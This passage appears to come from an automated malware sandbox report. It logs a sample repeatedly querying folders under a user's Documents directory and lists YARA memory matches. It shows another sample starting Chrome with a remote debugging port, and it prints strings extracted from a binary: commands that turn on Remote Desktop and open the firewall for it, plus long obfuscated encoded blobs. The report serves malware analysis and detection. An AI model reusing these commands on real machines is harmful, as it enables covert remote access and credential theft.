                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: number of queries: 2002
                              Source: Yara matchFile source: 0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000003.2774094257.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 142c991362.exe PID: 7012, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: Yara matchFile source: Process Memory Space: 2e4e1b8516.exe PID: 4904, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR
                              Source: 7739517025.exe, 0000000D.00000000.2660444929.0000000000581000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                              Source: 7739517025.exe, 0000000D.00000000.2660444929.0000000000581000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              Source: 7739517025.exe, 0000000D.00000002.2668628648.0000000000581000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: net start termservice
                              Source: 7739517025.exe, 0000000D.00000002.2668628648.0000000000581000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              Source: 7739517025.exe, 0000000D.00000003.2664537518.0000000007061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                              Source: 7739517025.exe, 0000000D.00000003.2664537518.0000000007061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR 